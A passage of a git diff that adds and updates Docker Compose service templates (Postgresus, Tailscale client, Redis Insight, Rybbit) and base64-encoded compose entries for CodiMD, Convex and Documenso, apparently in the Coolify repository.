./clickhouse/clickhouse-user-config.xml target: /etc/clickhouse-server/users.d/logging.xml diff --git a/templates/compose/postgresus.yaml b/templates/compose/postgresus.yaml new file mode 100644 index 000000000..a3a8a55e9 --- /dev/null +++ b/templates/compose/postgresus.yaml @@ -0,0 +1,20 @@ +# documentation: https://postgresus.com/#guide +# slogan: Postgresus is a free, open source and self-hosted tool to backup PostgreSQL. +# category: devtools +# tags: postgres,backup +# logo: svgs/postgresus.svg +# port: 4005 + +services: + postgresus: + image: rostislavdugin/postgresus:7fb59bb5d02fbaf856b0bcfc7a0786575818b96f # Released on 30 Sep, 2025 + environment: + - SERVICE_URL_POSTGRESUS_4005 + volumes: + - postgresus-data:/postgresus-data + healthcheck: + test: + ["CMD", "wget", "-qO-", "http://localhost:4005/api/v1/system/health"] + interval: 5s + timeout: 10s + retries: 5 diff --git a/templates/compose/redis-insight.yaml b/templates/compose/redis-insight.yaml index 2ba01c0c3..0e6056c6a 100644 --- a/templates/compose/redis-insight.yaml +++ b/templates/compose/redis-insight.yaml @@ -23,7 +23,7 @@ services: - CMD - wget - '--spider' - - 'http://localhost:5540' + - 'http://0.0.0.0:5540/api/health' interval: 10s retries: 3 timeout: 10s diff --git a/templates/compose/rybbit.yaml b/templates/compose/rybbit.yaml index 3c8f7564c..fe214bf16 100644 --- a/templates/compose/rybbit.yaml +++ b/templates/compose/rybbit.yaml @@ -1,6 +1,7 @@ # documentation: https://rybbit.io/docs # slogan: Open-source, privacy-first web analytics. -# tags: analytics,web,privacy,self-hosted,clickhouse,postgres +# category: analytics +# tags: analytics, web, privacy, self-hosted, clickhouse, postgres # logo: svgs/rybbit.svg # port: 3002 @@ -130,4 +131,4 @@ services: 0 - \ No newline at end of file + diff --git a/templates/compose/tailscale-client.yaml b/templates/compose/tailscale-client.yaml new file mode 100644 index 000000000..ed675e795 --- /dev/null +++ b/templates/compose/tailscale-client.yaml @@ -0,0 +1,43 @@ +# documentation: https://tailscale.com/kb +# slogan: Tailscale securely connects your devices over the internet using WireGuard. +# category: networking +# tags: vpn, wireguard, remote-access +# logo: svgs/tailscale.svg + +services: + tailscale-client: + image: 'tailscale/tailscale:latest' + hostname: '${TS_HOSTNAME:-coolify-ts}' + environment: + - 'TS_HOSTNAME=${TS_HOSTNAME:-coolify-ts}' + - 'TS_AUTHKEY=${TS_AUTHKEY:?}' + - 'TS_STATE_DIR=${TS_STATE_DIR:-/var/lib/tailscale}' + - 'TS_USERSPACE=${TS_USERSPACE:-false}' + volumes: + - 'tailscale-client:/var/lib/tailscale' + devices: + - '/dev/net/tun:/dev/net/tun' + cap_add: + - net_admin + healthcheck: + test: ["CMD-SHELL", "tailscale status --json | grep -q 'BackendState'"] + interval: 10s + timeout: 5s + retries: 5 + + nginx: + image: nginx:latest + depends_on: + - tailscale-client + network_mode: 'service:tailscale-client' + healthcheck: + test: + - CMD + - curl + - '-f' + - 'http://localhost:80/' + - '-o' + - /dev/null + interval: 20s + timeout: 5s + retries: 3 diff --git a/templates/service-templates-latest.json b/templates/service-templates-latest.json index 4d365b483..063556a14 100644 --- a/templates/service-templates-latest.json +++ b/templates/service-templates-latest.json @@ -581,7 +581,7 @@ "codimd": { "documentation": "https://hackmd.io/c/codimd-documentation?utm_source=coolify.io", "slogan": "Realtime collaborative markdown notes on all platforms", - "compose": "c2VydmljZXM6CiAgY29kaW1kOgogICAgaW1hZ2U6ICduYWJvLmNvZGltZC5kZXYvaGFja21kaW8vaGFja21kOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0NPRElNRF8zMDAwCiAgICAgIC0gJ0NNRF9ET01BSU49JHtTRVJWSUNFX1VSTF9DT0RJTUR9JwogICAgICAtICdDTURfUFJPVE9DT0xfVVNFU1NMPSR7Q01EX1BST1RPQ09MX1VTRVNTTDotZmFsc2V9JwogICAgICAtICdDTURfU0VTU0lPTl9TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEX1NFU1NJT05TRUNSRVR9JwogICAgICAtICdDTURfVVNFQ0ROPSR7Q01EX1VTRUNETjotZmFsc2V9JwogICAgICAtICdDTURfREJfVVJMPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke1BPU1RHUkVTX0RCOi1jb2RpbWQtZGJ9JwogICAgICAtICdDTURfRU1BSUw9JHtDTURfRU1BSUw6LXRydWV9JwogICAgICAtICdDTURfQUxMT1dfRU1BSUxfUkVHSVNURVI9JHtDTURfQUxMT1dfRU1BSUxfUkVHSVNURVI6LXRydWV9JwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnY3VybCAtZiBodHRwOi8vbG9jYWxob3N0OjMwMDAvIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiA1CiAgICB2b2x1bWVzOgogICAgICAtICd1cGxvYWRzX2RhdGE6L2hvbWUvaGFja21kL2FwcC9wdWJsaWMvdXBsb2FkcycKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncG9zdGdyZXM6MTYtYWxwaW5lJwogICAgdm9sdW1lczoKICAgICAgLSAnY29kaW1kX3Bvc3RncmVzX2RhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX1VTRVI9JHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1jb2RpbWQtZGJ9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", + "compose": "c2VydmljZXM6CiAgY29kaW1kOgogICAgaW1hZ2U6ICduYWJvLmNvZGltZC5kZXYvaGFja21kaW8vaGFja21kOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0NPRElNRF8zMDAwCiAgICAgIC0gJ0NNRF9ET01BSU49JHtTRVJWSUNFX0ZRRE5fQ09ESU1EfScKICAgICAgLSAnQ01EX1BST1RPQ09MX1VTRVNTTD0ke0NNRF9QUk9UT0NPTF9VU0VTU0w6LXRydWV9JwogICAgICAtICdDTURfU0VTU0lPTl9TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEX1NFU1NJT05TRUNSRVR9JwogICAgICAtICdDTURfVVNFQ0ROPSR7Q01EX1VTRUNETjotZmFsc2V9JwogICAgICAtICdDTURfREJfVVJMPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke1BPU1RHUkVTX0RCOi1jb2RpbWQtZGJ9JwogICAgICAtICdDTURfRU1BSUw9JHtDTURfRU1BSUw6LXRydWV9JwogICAgICAtICdDTURfQUxMT1dfRU1BSUxfUkVHSVNURVI9JHtDTURfQUxMT1dfRU1BSUxfUkVHSVNURVI6LXRydWV9JwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnY3VybCAtZiBodHRwOi8vbG9jYWxob3N0OjMwMDAvIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiA1CiAgICB2b2x1bWVzOgogICAgICAtICd1cGxvYWRzX2RhdGE6L2hvbWUvaGFja21kL2FwcC9wdWJsaWMvdXBsb2FkcycKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncG9zdGdyZXM6MTYtYWxwaW5lJwogICAgdm9sdW1lczoKICAgICAgLSAnY29kaW1kX3Bvc3RncmVzX2RhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX1VTRVI9JHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1jb2RpbWQtZGJ9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", "tags": [ "markdown", "md", @@ -599,7 +599,7 @@ "convex": { "documentation": "https://github.com/get-convex/convex-backend/blob/main/self-hosted/README.md?utm_source=coolify.io", "slogan": "Convex is the open-source reactive database for app developers.", - "compose": "c2VydmljZXM6CiAgYmFja2VuZDoKICAgIGltYWdlOiAnZ2hjci5pby9nZXQtY29udmV4L2NvbnZleC1iYWNrZW5kOjAwYmQ5MjcyMzQyMmYzYmZmOTY4MjMwYzk0Y2NkZWI4YzE3MTk4MzInCiAgICB2b2x1bWVzOgogICAgICAtICdkYXRhOi9jb252ZXgvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0JBQ0tFTkRfMzIxMAogICAgICAtICdJTlNUQU5DRV9OQU1FPSR7SU5TVEFOQ0VfTkFNRTotc2VsZi1ob3N0ZWQtY29udmV4fScKICAgICAgLSAnSU5TVEFOQ0VfU0VDUkVUPSR7U0VSVklDRV9IRVhfMzJfU0VDUkVUfScKICAgICAgLSAnQ09OVkVYX1JFTEVBU0VfVkVSU0lPTl9ERVY9JHtDT05WRVhfUkVMRUFTRV9WRVJTSU9OX0RFVjotfScKICAgICAgLSAnQUNUSU9OU19VU0VSX1RJTUVPVVRfU0VDUz0ke0FDVElPTlNfVVNFUl9USU1FT1VUX1NFQ1M6LX0nCiAgICAgIC0gJ0NPTlZFWF9DTE9VRF9PUklHSU49JHtTRVJWSUNFX1VSTF9DT05WRVh9JwogICAgICAtICdDT05WRVhfU0lURV9PUklHSU49JHtTRVJWSUNFX1VSTF9CQUNLRU5EfScKICAgICAgLSAnREFUQUJBU0VfVVJMPSR7REFUQUJBU0VfVVJMOi19JwogICAgICAtICdESVNBQkxFX0JFQUNPTj0ke0RJU0FCTEVfQkVBQ09OOj9mYWxzZX0nCiAgICAgIC0gJ1JFREFDVF9MT0dTX1RPX0NMSUVOVD0ke1JFREFDVF9MT0dTX1RPX0NMSUVOVDo/ZmFsc2V9JwogICAgICAtICdET19OT1RfUkVRVUlSRV9TU0w9JHtET19OT1RfUkVRVUlSRV9TU0w6P3RydWV9JwogICAgICAtICdQT1NUR1JFU19VUkw9JHtQT1NUR1JFU19VUkw6LX0nCiAgICAgIC0gJ01ZU1FMX1VSTD0ke01ZU1FMX1VSTDotfScKICAgICAgLSAnUlVTVF9MT0c9JHtSVVNUX0xPRzotaW5mb30nCiAgICAgIC0gJ1JVU1RfQkFDS1RSQUNFPSR7UlVTVF9CQUNLVFJBQ0U6LX0nCiAgICAgIC0gJ0FXU19SRUdJT049JHtBV1NfUkVHSU9OOi19JwogICAgICAtICdBV1NfQUNDRVNTX0tFWV9JRD0ke0FXU19BQ0NFU1NfS0VZX0lEOi19JwogICAgICAtICdBV1NfU0VDUkVUX0FDQ0VTU19LRVk9JHtBV1NfU0VDUkVUX0FDQ0VTU19LRVk6LX0nCiAgICAgIC0gJ0FXU19TRVNTSU9OX1RPS0VOPSR7QVdTX1NFU1NJT05fVE9LRU46LX0nCiAgICAgIC0gJ0FXU19TM19GT1JDRV9QQVRIX1NUWUxFPSR7QVdTX1MzX0ZPUkNFX1BBVEhfU1RZTEU6LX0nCiAgICAgIC0gJ0FXU19TM19ESVNBQkxFX1NTRT0ke0FXU19TM19ESVNBQkxFX1NTRTotfScKICAgICAgLSAnQVdTX1MzX0RJU0FCTEVfQ0hFQ0tTVU1TPSR7QVdTX1MzX0RJU0FCTEVfQ0hFQ0tTVU1TOi19JwogICAgICAtICdTM19TVE9SQUdFX0VYUE9SVFNfQlVDS0VUPSR7UzNfU1RPUkFHRV9FWFBPUlRTX0JVQ0tFVDotfScKICAgICAgLSAnUzNfU1RPUkFHRV9TTkFQU0hPVF9JTVBPUlRTX0JVQ0tFVD0ke1MzX1NUT1JBR0VfU05BUFNIT1RfSU1QT1JUU19CVUNLRVQ6LX0nCiAgICAgIC0gJ1MzX1NUT1JBR0VfTU9EVUxFU19CVUNLRVQ9JHtTM19TVE9SQUdFX01PRFVMRVNfQlVDS0VUOi19JwogICAgICAtICdTM19TVE9SQUdFX0ZJTEVTX0JVQ0tFVD0ke1MzX1NUT1JBR0VfRklMRVNfQlVDS0VUOi19JwogICAgICAtICdTM19TVE9SQUdFX1NFQVJDSF9CVUNLRVQ9JHtTM19TVE9SQUdFX1NFQVJDSF9CVUNLRVQ6LX0nCiAgICAgIC0gJ1MzX0VORFBPSU5UX1VSTD0ke1MzX0VORFBPSU5UX1VSTDotfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OiAnY3VybCAtZiBodHRwOi8vMTI3LjAuMC4xOjMyMTAvdmVyc2lvbicKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHN0YXJ0X3BlcmlvZDogMTBzCiAgZGFzaGJvYXJkOgogICAgaW1hZ2U6ICdnaGNyLmlvL2dldC1jb252ZXgvY29udmV4LWRhc2hib2FyZDozM2NlZjc3NWE4YTYyMjhjYmFjZWU0YTA5YWMyYzQwNzNkNjJlZDEzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfQ09OVkVYXzY3OTEKICAgICAgLSAnTkVYVF9QVUJMSUNfREVQTE9ZTUVOVF9VUkw9JHtTRVJWSUNFX1VSTF9CQUNLRU5EfScKICAgIGRlcGVuZHNfb246CiAgICAgIGJhY2tlbmQ6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OiAnd2dldCAtcU8tIGh0dHA6Ly8xMjcuMC4wLjE6Njc5MS8nCiAgICAgIGludGVydmFsOiA1cwogICAgICBzdGFydF9wZXJpb2Q6IDVzCg==", + "compose": "c2VydmljZXM6CiAgYmFja2VuZDoKICAgIGltYWdlOiAnZ2hjci5pby9nZXQtY29udmV4L2NvbnZleC1iYWNrZW5kOjAwYmQ5MjcyMzQyMmYzYmZmOTY4MjMwYzk0Y2NkZWI4YzE3MTk4MzInCiAgICB2b2x1bWVzOgogICAgICAtICdkYXRhOi9jb252ZXgvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0JBQ0tFTkRfMzIxMAogICAgICAtICdJTlNUQU5DRV9OQU1FPSR7SU5TVEFOQ0VfTkFNRTotc2VsZi1ob3N0ZWQtY29udmV4fScKICAgICAgLSAnSU5TVEFOQ0VfU0VDUkVUPSR7U0VSVklDRV9IRVhfMzJfU0VDUkVUfScKICAgICAgLSAnQ09OVkVYX1JFTEVBU0VfVkVSU0lPTl9ERVY9JHtDT05WRVhfUkVMRUFTRV9WRVJTSU9OX0RFVjotfScKICAgICAgLSAnQUNUSU9OU19VU0VSX1RJTUVPVVRfU0VDUz0ke0FDVElPTlNfVVNFUl9USU1FT1VUX1NFQ1M6LX0nCiAgICAgIC0gJ0NPTlZFWF9DTE9VRF9PUklHSU49JHtTRVJWSUNFX1VSTF9EQVNIQk9BUkR9JwogICAgICAtICdDT05WRVhfU0lURV9PUklHSU49JHtTRVJWSUNFX1VSTF9CQUNLRU5EfScKICAgICAgLSAnREFUQUJBU0VfVVJMPSR7REFUQUJBU0VfVVJMOi19JwogICAgICAtICdESVNBQkxFX0JFQUNPTj0ke0RJU0FCTEVfQkVBQ09OOj9mYWxzZX0nCiAgICAgIC0gJ1JFREFDVF9MT0dTX1RPX0NMSUVOVD0ke1JFREFDVF9MT0dTX1RPX0NMSUVOVDo/ZmFsc2V9JwogICAgICAtICdET19OT1RfUkVRVUlSRV9TU0w9JHtET19OT1RfUkVRVUlSRV9TU0w6P3RydWV9JwogICAgICAtICdQT1NUR1JFU19VUkw9JHtQT1NUR1JFU19VUkw6LX0nCiAgICAgIC0gJ01ZU1FMX1VSTD0ke01ZU1FMX1VSTDotfScKICAgICAgLSAnUlVTVF9MT0c9JHtSVVNUX0xPRzotaW5mb30nCiAgICAgIC0gJ1JVU1RfQkFDS1RSQUNFPSR7UlVTVF9CQUNLVFJBQ0U6LX0nCiAgICAgIC0gJ0FXU19SRUdJT049JHtBV1NfUkVHSU9OOi19JwogICAgICAtICdBV1NfQUNDRVNTX0tFWV9JRD0ke0FXU19BQ0NFU1NfS0VZX0lEOi19JwogICAgICAtICdBV1NfU0VDUkVUX0FDQ0VTU19LRVk9JHtBV1NfU0VDUkVUX0FDQ0VTU19LRVk6LX0nCiAgICAgIC0gJ0FXU19TRVNTSU9OX1RPS0VOPSR7QVdTX1NFU1NJT05fVE9LRU46LX0nCiAgICAgIC0gJ0FXU19TM19GT1JDRV9QQVRIX1NUWUxFPSR7QVdTX1MzX0ZPUkNFX1BBVEhfU1RZTEU6LX0nCiAgICAgIC0gJ0FXU19TM19ESVNBQkxFX1NTRT0ke0FXU19TM19ESVNBQkxFX1NTRTotfScKICAgICAgLSAnQVdTX1MzX0RJU0FCTEVfQ0hFQ0tTVU1TPSR7QVdTX1MzX0RJU0FCTEVfQ0hFQ0tTVU1TOi19JwogICAgICAtICdTM19TVE9SQUdFX0VYUE9SVFNfQlVDS0VUPSR7UzNfU1RPUkFHRV9FWFBPUlRTX0JVQ0tFVDotfScKICAgICAgLSAnUzNfU1RPUkFHRV9TTkFQU0hPVF9JTVBPUlRTX0JVQ0tFVD0ke1MzX1NUT1JBR0VfU05BUFNIT1RfSU1QT1JUU19CVUNLRVQ6LX0nCiAgICAgIC0gJ1MzX1NUT1JBR0VfTU9EVUxFU19CVUNLRVQ9JHtTM19TVE9SQUdFX01PRFVMRVNfQlVDS0VUOi19JwogICAgICAtICdTM19TVE9SQUdFX0ZJTEVTX0JVQ0tFVD0ke1MzX1NUT1JBR0VfRklMRVNfQlVDS0VUOi19JwogICAgICAtICdTM19TVE9SQUdFX1NFQVJDSF9CVUNLRVQ9JHtTM19TVE9SQUdFX1NFQVJDSF9CVUNLRVQ6LX0nCiAgICAgIC0gJ1MzX0VORFBPSU5UX1VSTD0ke1MzX0VORFBPSU5UX1VSTDotfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OiAnY3VybCAtZiBodHRwOi8vMTI3LjAuMC4xOjMyMTAvdmVyc2lvbicKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHN0YXJ0X3BlcmlvZDogMTBzCiAgZGFzaGJvYXJkOgogICAgaW1hZ2U6ICdnaGNyLmlvL2dldC1jb252ZXgvY29udmV4LWRhc2hib2FyZDozM2NlZjc3NWE4YTYyMjhjYmFjZWU0YTA5YWMyYzQwNzNkNjJlZDEzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfREFTSEJPQVJEXzY3OTEKICAgICAgLSAnTkVYVF9QVUJMSUNfREVQTE9ZTUVOVF9VUkw9JHtTRVJWSUNFX1VSTF9CQUNLRU5EfScKICAgIGRlcGVuZHNfb246CiAgICAgIGJhY2tlbmQ6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OiAnd2dldCAtcU8tIGh0dHA6Ly8xMjcuMC4wLjE6Njc5MS8nCiAgICAgIGludGVydmFsOiA1cwogICAgICBzdGFydF9wZXJpb2Q6IDVzCg==", "tags": [ "database", "reactive", @@ -760,7 +760,7 @@ "documenso": { "documentation": "https://docs.documenso.com/?utm_source=coolify.io", "slogan": "Document signing, finally open source", - "compose": "c2VydmljZXM6CiAgZG9jdW1lbnNvOgogICAgaW1hZ2U6ICdkb2N1bWVuc28vZG9jdW1lbnNvOnYxLjEyLjEwJwogICAgZGVwZW5kc19vbjoKICAgICAgZGF0YWJhc2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0RPQ1VNRU5TT18zMDAwCiAgICAgIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0RPQ1VNRU5TT30nCiAgICAgIC0gJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X0FVVEhTRUNSRVR9JwogICAgICAtICdORVhUX1BSSVZBVEVfRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX0JBU0U2NF9FTkNSWVBUSU9OS0VZfScKICAgICAgLSAnTkVYVF9QUklWQVRFX0VOQ1JZUFRJT05fU0VDT05EQVJZX0tFWT0ke1NFUlZJQ0VfQkFTRTY0X1NFQ09OREFSWUVOQ1JZUFRJT05LRVl9JwogICAgICAtICdORVhUX1BVQkxJQ19XRUJBUFBfVVJMPSR7U0VSVklDRV9VUkxfRE9DVU1FTlNPfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1JFU0VORF9BUElfS0VZPSR7TkVYVF9QUklWQVRFX1JFU0VORF9BUElfS0VZfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfVFJBTlNQT1JUPSR7TkVYVF9QUklWQVRFX1NNVFBfVFJBTlNQT1JUfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfSE9TVD0ke05FWFRfUFJJVkFURV9TTVRQX0hPU1R9JwogICAgICAtICdORVhUX1BSSVZBVEVfU01UUF9QT1JUPSR7TkVYVF9QUklWQVRFX1NNVFBfUE9SVH0nCiAgICAgIC0gJ05FWFRfUFJJVkFURV9TTVRQX1VTRVJOQU1FPSR7TkVYVF9QUklWQVRFX1NNVFBfVVNFUk5BTUV9JwogICAgICAtICdORVhUX1BSSVZBVEVfU01UUF9QQVNTV09SRD0ke05FWFRfUFJJVkFURV9TTVRQX1BBU1NXT1JEfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfRlJPTV9OQU1FPSR7TkVYVF9QUklWQVRFX1NNVFBfRlJPTV9OQU1FfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfRlJPTV9BRERSRVNTPSR7TkVYVF9QUklWQVRFX1NNVFBfRlJPTV9BRERSRVNTfScKICAgICAgLSAnTkVYVF9QUklWQVRFX0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AZGF0YWJhc2UvJHtQT1NUR1JFU19EQjotZG9jdW1lbnNvLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdORVhUX1BSSVZBVEVfRElSRUNUX0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AZGF0YWJhc2UvJHtQT1NUR1JFU19EQjotZG9jdW1lbnNvLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtIE5FWFRfUFJJVkFURV9TSUdOSU5HX0xPQ0FMX0ZJTEVfUEFUSD0vYXBwL2FwcHMvcmVtaXgvY2VydHMvY2VydGlmaWNhdGUucDEyCiAgICAgIC0gJ05FWFRfUFJJVkFURV9TSUdOSU5HX1BBU1NQSFJBU0U9JHtTRVJWSUNFX1BBU1NXT1JEX0RPQ1VNRU5TT30nCiAgICAgIC0gJ0NFUlRfVkFMSURfREFZUz0ke0NFUlRfVkFMSURfREFZUzotMzY1fScKICAgICAgLSAnQ0VSVF9JTkZPX0NPVU5UUllfTkFNRT0ke0NFUlRfSU5GT19DT1VOVFJZX05BTUU6LURPfScKICAgICAgLSAnQ0VSVF9JTkZPX1NUQVRFX09SX1BST1ZJREVOQ0U9JHtDRVJUX0lORk9fU1RBVEVfT1JfUFJPVklERU5DRTotU2FudGlhZ299JwogICAgICAtICdDRVJUX0lORk9fTE9DQUxJVFlfTkFNRT0ke0NFUlRfSU5GT19MT0NBTElUWV9OQU1FOi1TYW50aWFnb30nCiAgICAgIC0gJ0NFUlRfSU5GT19PUkdBTklaQVRJT05fTkFNRT0ke0NFUlRfSU5GT19PUkdBTklaQVRJT05fTkFNRTotRXhhbXBsZSBJTkN9JwogICAgICAtICdDRVJUX0lORk9fT1JHQU5JWkFUSU9OQUxfVU5JVD0ke0NFUlRfSU5GT19PUkdBTklaQVRJT05BTF9VTklUOi1JVCBEZXBhcnRtZW50fScKICAgICAgLSAnQ0VSVF9JTkZPX0VNQUlMPSR7Q0VSVF9JTkZPX0VNQUlMOi1leGFtcGxlQGdtYWlsLmNvbX0nCiAgICAgIC0gJ05FWFRfUFVCTElDX0RJU0FCTEVfU0lHTlVQPSR7RElTQUJMRV9MT0dJTjotZmFsc2V9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICJ3Z2V0IC1xIC1PIC0gaHR0cDovL2RvY3VtZW5zbzozMDAwLyB8IGdyZXAgLXEgJ1NpZ24gaW4gdG8geW91ciBhY2NvdW50JyIKICAgICAgaW50ZXJ2YWw6IDJzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAyMAogICAgZW50cnlwb2ludDoKICAgICAgLSAvYmluL3NoCiAgICAgIC0gJy1jJwogICAgICAtICJlY2hvIFwiLi9jZXJ0c1wiID4gL3RtcC9jZXJ0c19kaXJfcGF0aFxuZWNobyBcIi4vbWFrZS1jZXJ0cy5zaFwiID4gL3RtcC9jZXJ0X3NjcmlwdF9wYXRoXG5lY2hvIFwiJHtTRVJWSUNFX1BBU1NXT1JEX0RPQ1VNRU5TT31cIiA+IC90bXAvY2VydF9wYXNzXG5cbnRvdWNoIC90bXAvY2VydF9pbmZvX3BhdGhcbmNhdCA8PEVPRiA+IC90bXAvY2VydF9pbmZvX3BhdGhcblsgcmVxIF1cbmRpc3Rpbmd1aXNoZWRfbmFtZSA9IHJlcV9kaXN0aW5ndWlzaGVkX25hbWVcbnByb21wdCA9IG5vXG5bIHJlcV9kaXN0aW5ndWlzaGVkX25hbWUgXVxuQyAgICAgICAgICAgID0gJHtDRVJUX0lORk9fQ09VTlRSWV9OQU1FfVxuU1QgICAgICAgICAgID0gJHtDRVJUX0lORk9fU1RBVEVfT1JfUFJPVklERU5DRX1cbkwgICAgICAgICAgICA9ICR7Q0VSVF9JTkZPX0xPQ0FMSVRZX05BTUV9XG5PICAgICAgICAgICAgPSAke0NFUlRfSU5GT19PUkdBTklaQVRJT05fTkFNRX1cbk9VICAgICAgICAgICA9ICR7Q0VSVF9JTkZPX09SR0FOSVpBVElPTkFMX1VOSVR9XG5DTiAgICAgICAgICAgPSAke1NFUlZJQ0VfVVJMX0RPQ1VNRU5TT31cbmVtYWlsQWRkcmVzcyA9ICR7Q0VSVF9JTkZPX0VNQUlMfVxuRU9GXG5cbmNhdCA8PEVPRiA+IFwiJChjYXQgL3RtcC9jZXJ0X3NjcmlwdF9wYXRoKVwiXG5ta2RpciAtcCBcIiQoY2F0IC90bXAvY2VydHNfZGlyX3BhdGgpXCIgJiYgY2QgXCIkKGNhdCAvdG1wL2NlcnRzX2Rpcl9wYXRoKVwiXG5cbm9wZW5zc2wgZ2VucnNhIC1vdXQgcHJpdmF0ZS5rZXkgMjA0OFxuXG5vcGVuc3NsIHJlcSBcXFxuICAtbmV3IFxcXG4gIC14NTA5IFxcXG4gIC1rZXkgcHJpdmF0ZS5rZXkgXFxcbiAgLW91dCBjZXJ0aWZpY2F0ZS5jcnQgXFxcbiAgLWRheXMgJHtDRVJUX1ZBTElEX0RBWVN9IFxcXG4gIC1jb25maWcgL3RtcC9jZXJ0X2luZm9fcGF0aFxuXG5vcGVuc3NsIHBrY3MxMiBcXFxuICAtZXhwb3J0IFxcXG4gIC1vdXQgY2VydGlmaWNhdGUucDEyIFxcXG4gIC1pbmtleSBwcml2YXRlLmtleSBcXFxuICAtaW4gY2VydGlmaWNhdGUuY3J0IFxcXG4gIC1sZWdhY3kgXFxcbiAgLXBhc3N3b3JkIGZpbGU6L3RtcC9jZXJ0X3Bhc3NcbkVPRlxuY2htb2QgK3ggXCIkKGNhdCAvdG1wL2NlcnRfc2NyaXB0X